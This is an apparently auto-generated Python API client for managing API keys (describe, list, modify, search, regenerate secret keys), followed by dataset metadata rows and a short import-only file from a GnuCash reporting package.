    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/apikeys/{apiKeyID}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def describe_api_key(self, api_key_id, api_version, **kwargs):  # noqa: E501
    """Describe an API Key  # noqa: E501

    Describe an API key by ID.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.describe_api_key(api_key_id, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int api_key_id: The ID number of the API key to describe. (required)
    :param str api_version: The version of the api being called. (required)
    :return: ApiKey
             If the method is called asynchronously,
             returns the request thread.
    """
    # This wrapper always requests just the response payload; callers
    # needing status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    # A synchronous call yields the deserialized ApiKey while
    # async_req=True yields the request thread; in both cases the value
    # from the *_with_http_info helper is returned unchanged.
    return self.describe_api_key_with_http_info(api_key_id, api_version, **kwargs)  # noqa: E501
def describe_api_key_with_http_info(self, api_key_id, api_version, **kwargs):  # noqa: E501
    """Describe an API Key  # noqa: E501

    Describe an API key by ID.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.describe_api_key_with_http_info(api_key_id, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int api_key_id: The ID number of the API key to describe. (required)
    :param str api_version: The version of the api being called. (required)
    :return: ApiKey
             If the method is called asynchronously,
             returns the request thread.
    """
    # Recognized keyword arguments; anything else raises TypeError below.
    all_params = ['api_key_id', 'api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the local namespace so positional args and validated
    # keyword args can be read uniformly as params['name'] below.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method describe_api_key" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'api_key_id' is set
    if ('api_key_id' not in params or
            params['api_key_id'] is None):
        raise ValueError("Missing the required parameter `api_key_id` when calling `describe_api_key`")  # noqa: E501
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `describe_api_key`")  # noqa: E501

    # NOTE(review): re.search only requires one digit somewhere in the
    # value; it does not anchor the whole string against `\d+`.
    if 'api_key_id' in params and not re.search('\\d+', str(params['api_key_id'])):  # noqa: E501
        raise ValueError("Invalid value for parameter `api_key_id` when calling `describe_api_key`, must conform to the pattern `/\\d+/`")  # noqa: E501

    collection_formats = {}

    # api_key_id fills the {apiKeyID} template in the request path.
    path_params = {}
    if 'api_key_id' in params:
        path_params['apiKeyID'] = params['api_key_id']  # noqa: E501

    query_params = []

    # api_version is sent as the `api-version` request header.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    # GET sends no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/apikeys/{apiKeyID}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiKey',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def describe_current_api_key(self, api_version, **kwargs):  # noqa: E501
    """Describe the Current API Key  # noqa: E501

    Describe the API key that is associated with the credentials that are being used to authenticate this call. Authentication must be done via an API secret key.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.describe_current_api_key(api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str api_version: The version of the api being called. (required)
    :return: ApiKeyCurrent
             If the method is called asynchronously,
             returns the request thread.
    """
    # This wrapper always requests just the response payload; callers
    # needing status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    # A synchronous call yields the deserialized ApiKeyCurrent while
    # async_req=True yields the request thread; in both cases the value
    # from the *_with_http_info helper is returned unchanged.
    return self.describe_current_api_key_with_http_info(api_version, **kwargs)  # noqa: E501
def describe_current_api_key_with_http_info(self, api_version, **kwargs):  # noqa: E501
    """Describe the Current API Key  # noqa: E501

    Describe the API key that is associated with the credentials that are being used to authenticate this call. Authentication must be done via an API secret key.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.describe_current_api_key_with_http_info(api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str api_version: The version of the api being called. (required)
    :return: ApiKeyCurrent
             If the method is called asynchronously,
             returns the request thread.
    """
    # Recognized keyword arguments; anything else raises TypeError below.
    all_params = ['api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the local namespace so positional args and validated
    # keyword args can be read uniformly as params['name'] below.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method describe_current_api_key" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `describe_current_api_key`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    # api_version is sent as the `api-version` request header.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    # GET sends no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/apikeys/current', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiKeyCurrent',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_api_keys(self, api_version, **kwargs):  # noqa: E501
    """List API Keys  # noqa: E501

    Lists all API keys.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.list_api_keys(api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str api_version: The version of the api being called. (required)
    :return: ApiKeys
             If the method is called asynchronously,
             returns the request thread.
    """
    # This wrapper always requests just the response payload; callers
    # needing status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    # A synchronous call yields the deserialized ApiKeys while
    # async_req=True yields the request thread; in both cases the value
    # from the *_with_http_info helper is returned unchanged.
    return self.list_api_keys_with_http_info(api_version, **kwargs)  # noqa: E501
def list_api_keys_with_http_info(self, api_version, **kwargs):  # noqa: E501
    """List API Keys  # noqa: E501

    Lists all API keys.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.list_api_keys_with_http_info(api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str api_version: The version of the api being called. (required)
    :return: ApiKeys
             If the method is called asynchronously,
             returns the request thread.
    """
    # Recognized keyword arguments; anything else raises TypeError below.
    all_params = ['api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the local namespace so positional args and validated
    # keyword args can be read uniformly as params['name'] below.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_api_keys" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `list_api_keys`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    # api_version is sent as the `api-version` request header.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    # GET sends no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/apikeys', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiKeys',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def modify_api_key(self, api_key_id, api_key, api_version, **kwargs):  # noqa: E501
    """Modify an API Key  # noqa: E501

    Modify an API key by ID. Any unset elements will be left unchanged.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.modify_api_key(api_key_id, api_key, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int api_key_id: The ID number of the API key to modify. (required)
    :param ApiKey api_key: The settings of the API key to modify. (required)
    :param str api_version: The version of the api being called. (required)
    :return: ApiKey
             If the method is called asynchronously,
             returns the request thread.
    """
    # This wrapper always requests just the response payload; callers
    # needing status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    # A synchronous call yields the deserialized ApiKey while
    # async_req=True yields the request thread; in both cases the value
    # from the *_with_http_info helper is returned unchanged.
    return self.modify_api_key_with_http_info(api_key_id, api_key, api_version, **kwargs)  # noqa: E501
def modify_api_key_with_http_info(self, api_key_id, api_key, api_version, **kwargs):  # noqa: E501
    """Modify an API Key  # noqa: E501

    Modify an API key by ID. Any unset elements will be left unchanged.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.modify_api_key_with_http_info(api_key_id, api_key, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int api_key_id: The ID number of the API key to modify. (required)
    :param ApiKey api_key: The settings of the API key to modify. (required)
    :param str api_version: The version of the api being called. (required)
    :return: ApiKey
             If the method is called asynchronously,
             returns the request thread.
    """
    # Recognized keyword arguments; anything else raises TypeError below.
    all_params = ['api_key_id', 'api_key', 'api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the local namespace so positional args and validated
    # keyword args can be read uniformly as params['name'] below.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method modify_api_key" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'api_key_id' is set
    if ('api_key_id' not in params or
            params['api_key_id'] is None):
        raise ValueError("Missing the required parameter `api_key_id` when calling `modify_api_key`")  # noqa: E501
    # verify the required parameter 'api_key' is set
    if ('api_key' not in params or
            params['api_key'] is None):
        raise ValueError("Missing the required parameter `api_key` when calling `modify_api_key`")  # noqa: E501
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `modify_api_key`")  # noqa: E501

    # NOTE(review): re.search only requires one digit somewhere in the
    # value; it does not anchor the whole string against `\d+`.
    if 'api_key_id' in params and not re.search('\\d+', str(params['api_key_id'])):  # noqa: E501
        raise ValueError("Invalid value for parameter `api_key_id` when calling `modify_api_key`, must conform to the pattern `/\\d+/`")  # noqa: E501

    collection_formats = {}

    # api_key_id fills the {apiKeyID} template in the request path.
    path_params = {}
    if 'api_key_id' in params:
        path_params['apiKeyID'] = params['api_key_id']  # noqa: E501

    query_params = []

    # api_version is sent as the `api-version` request header.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    # The ApiKey settings object is serialized as the request body.
    body_params = None
    if 'api_key' in params:
        body_params = params['api_key']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/apikeys/{apiKeyID}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiKey',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def modify_current_api_key(self, api_key, api_version, **kwargs):  # noqa: E501
    """Modify the Current API Key  # noqa: E501

    Modify the API key that is associated with the credentials that are being used to authenticate this call. Authentication must be done via an API secret key. Writable fields are: keyName, description, locale, & timeZone. Any unset elements will be left unchanged.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.modify_current_api_key(api_key, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ApiKeyCurrent api_key: The settings of the API key to modify. (required)
    :param str api_version: The version of the api being called. (required)
    :return: ApiKeyCurrent
             If the method is called asynchronously,
             returns the request thread.
    """
    # This wrapper always requests just the response payload; callers
    # needing status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    # A synchronous call yields the deserialized ApiKeyCurrent while
    # async_req=True yields the request thread; in both cases the value
    # from the *_with_http_info helper is returned unchanged.
    return self.modify_current_api_key_with_http_info(api_key, api_version, **kwargs)  # noqa: E501
def modify_current_api_key_with_http_info(self, api_key, api_version, **kwargs):  # noqa: E501
    """Modify the Current API Key  # noqa: E501

    Modify the API key that is associated with the credentials that are being used to authenticate this call. Authentication must be done via an API secret key. Writable fields are: keyName, description, locale, & timeZone. Any unset elements will be left unchanged.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.modify_current_api_key_with_http_info(api_key, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ApiKeyCurrent api_key: The settings of the API key to modify. (required)
    :param str api_version: The version of the api being called. (required)
    :return: ApiKeyCurrent
             If the method is called asynchronously,
             returns the request thread.
    """
    # Recognized keyword arguments; anything else raises TypeError below.
    all_params = ['api_key', 'api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the local namespace so positional args and validated
    # keyword args can be read uniformly as params['name'] below.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method modify_current_api_key" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'api_key' is set
    if ('api_key' not in params or
            params['api_key'] is None):
        raise ValueError("Missing the required parameter `api_key` when calling `modify_current_api_key`")  # noqa: E501
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `modify_current_api_key`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    # api_version is sent as the `api-version` request header.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    # The ApiKeyCurrent settings object is serialized as the request body.
    body_params = None
    if 'api_key' in params:
        body_params = params['api_key']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/apikeys/current', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiKeyCurrent',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def replace_api_secret_key(self, api_key_id, api_version, **kwargs):  # noqa: E501
    """Generate an API Secret Key  # noqa: E501

    Generate a new API secret key.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.replace_api_secret_key(api_key_id, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int api_key_id: The ID number of API key used to generate the secret key. (required)
    :param str api_version: The version of the api being called. (required)
    :return: ApiKey
             If the method is called asynchronously,
             returns the request thread.
    """
    # This wrapper always requests just the response payload; callers
    # needing status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    # A synchronous call yields the deserialized ApiKey while
    # async_req=True yields the request thread; in both cases the value
    # from the *_with_http_info helper is returned unchanged.
    return self.replace_api_secret_key_with_http_info(api_key_id, api_version, **kwargs)  # noqa: E501
def replace_api_secret_key_with_http_info(self, api_key_id, api_version, **kwargs):  # noqa: E501
    """Generate an API Secret Key  # noqa: E501

    Generate a new API secret key.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.replace_api_secret_key_with_http_info(api_key_id, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int api_key_id: The ID number of API key used to generate the secret key. (required)
    :param str api_version: The version of the api being called. (required)
    :return: ApiKey
             If the method is called asynchronously,
             returns the request thread.
    """
    # Recognized keyword arguments; anything else raises TypeError below.
    all_params = ['api_key_id', 'api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the local namespace so positional args and validated
    # keyword args can be read uniformly as params['name'] below.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_api_secret_key" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'api_key_id' is set
    if ('api_key_id' not in params or
            params['api_key_id'] is None):
        raise ValueError("Missing the required parameter `api_key_id` when calling `replace_api_secret_key`")  # noqa: E501
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `replace_api_secret_key`")  # noqa: E501

    # NOTE(review): re.search only requires one digit somewhere in the
    # value; it does not anchor the whole string against `\d+`.
    if 'api_key_id' in params and not re.search('\\d+', str(params['api_key_id'])):  # noqa: E501
        raise ValueError("Invalid value for parameter `api_key_id` when calling `replace_api_secret_key`, must conform to the pattern `/\\d+/`")  # noqa: E501

    collection_formats = {}

    # api_key_id fills the {apiKeyID} template in the request path.
    path_params = {}
    if 'api_key_id' in params:
        path_params['apiKeyID'] = params['api_key_id']  # noqa: E501

    query_params = []

    # api_version is sent as the `api-version` request header.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    # POST here carries no request body; the server generates the key.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/apikeys/{apiKeyID}/secretkey', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiKey',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def replace_current_api_secret_key(self, api_version, **kwargs):  # noqa: E501
    """Generate a Secret Key for the Current API Key  # noqa: E501

    Generate a new secret key for the current API key. Authentication must be done via an API secret key.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.replace_current_api_secret_key(api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str api_version: The version of the api being called. (required)
    :return: ApiKey
             If the method is called asynchronously,
             returns the request thread.
    """
    # This wrapper always requests just the response payload; callers
    # needing status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    # A synchronous call yields the deserialized ApiKey while
    # async_req=True yields the request thread; in both cases the value
    # from the *_with_http_info helper is returned unchanged.
    return self.replace_current_api_secret_key_with_http_info(api_version, **kwargs)  # noqa: E501
def replace_current_api_secret_key_with_http_info(self, api_version, **kwargs):  # noqa: E501
    """Generate a Secret Key for the Current API Key  # noqa: E501

    Generate a new secret key for the current API key. Authentication must be done via an API secret key.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.replace_current_api_secret_key_with_http_info(api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str api_version: The version of the api being called. (required)
    :return: ApiKey
             If the method is called asynchronously,
             returns the request thread.
    """
    # Recognized keyword arguments; anything else raises TypeError below.
    all_params = ['api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the local namespace so positional args and validated
    # keyword args can be read uniformly as params['name'] below.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_current_api_secret_key" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `replace_current_api_secret_key`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    # api_version is sent as the `api-version` request header.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    # POST here carries no request body; the server generates the key.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/apikeys/current/secretkey', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiKey',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def search_api_keys(self, api_version, **kwargs):  # noqa: E501
    """Search API Keys  # noqa: E501

    Search for API keys using optional filters.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.search_api_keys(api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str api_version: The version of the api being called. (required)
    :param SearchFilter search_filter: A collection of options used to filter the search results.
    :return: ApiKeys
             If the method is called asynchronously,
             returns the request thread.
    """
    # This wrapper always requests just the response payload; callers
    # needing status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    # A synchronous call yields the deserialized ApiKeys while
    # async_req=True yields the request thread; in both cases the value
    # from the *_with_http_info helper is returned unchanged.
    return self.search_api_keys_with_http_info(api_version, **kwargs)  # noqa: E501
    def search_api_keys_with_http_info(self, api_version, **kwargs):  # noqa: E501
        """Search API Keys  # noqa: E501

        Search for API keys using optional filters.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.search_api_keys_with_http_info(api_version, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str api_version: The version of the api being called. (required)
        :param SearchFilter search_filter: A collection of options used to filter the search results.
        :return: ApiKeys
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Whitelist of keyword arguments accepted by this endpoint.
        all_params = ['api_version', 'search_filter']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() captures `self`, `api_version` and `kwargs`; recognised
        # kwargs are flattened into `params`, anything unknown is rejected.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method search_api_keys" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'api_version' is set
        if ('api_version' not in params or
                params['api_version'] is None):
            raise ValueError("Missing the required parameter `api_version` when calling `search_api_keys`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        # api_version is sent as the `api-version` request header.
        if 'api_version' in params:
            header_params['api-version'] = params['api_version']  # noqa: E501
        form_params = []
        local_var_files = {}
        # The optional SearchFilter travels in the JSON request body.
        body_params = None
        if 'search_filter' in params:
            body_params = params['search_filter']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['DefaultAuthentication']  # noqa: E501
        return self.api_client.call_api(
            '/apikeys/search', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ApiKeys',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| 44.007319
| 311
| 0.608316
| 5,794
| 48,100
| 4.792544
| 0.038833
| 0.046672
| 0.020743
| 0.02881
| 0.973243
| 0.970254
| 0.968885
| 0.965068
| 0.962475
| 0.96017
| 0
| 0.016764
| 0.305509
| 48,100
| 1,092
| 312
| 44.047619
| 0.814489
| 0.335094
| 0
| 0.823232
| 0
| 0
| 0.218026
| 0.041958
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035354
| false
| 0
| 0.006734
| 0
| 0.094276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8033e3598436baec3a6efc3039c1d8f8d116a59a
| 162
|
py
|
Python
|
piecash_utilities/report/__init__.py
|
sdementen/gnucash-utilities
|
973edf1d32d674f6bedbb38f63f687f7a0aa642b
|
[
"MIT"
] | 13
|
2016-12-22T23:14:29.000Z
|
2021-01-12T07:22:12.000Z
|
piecash_utilities/report/__init__.py
|
sdementen/gnucash-utilities
|
973edf1d32d674f6bedbb38f63f687f7a0aa642b
|
[
"MIT"
] | 5
|
2017-11-12T19:53:49.000Z
|
2017-11-23T13:26:04.000Z
|
piecash_utilities/report/__init__.py
|
sdementen/gnucash-utilities
|
973edf1d32d674f6bedbb38f63f687f7a0aa642b
|
[
"MIT"
] | 4
|
2017-09-06T20:00:23.000Z
|
2019-03-26T14:14:40.000Z
|
from .options import DateOption, StringOption, RangeOption
from .report import report, generate_sample_report_python, generate_sample_report_html, execute_report
| 54
| 102
| 0.876543
| 20
| 162
| 6.75
| 0.6
| 0.207407
| 0.296296
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080247
| 162
| 2
| 103
| 81
| 0.90604
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
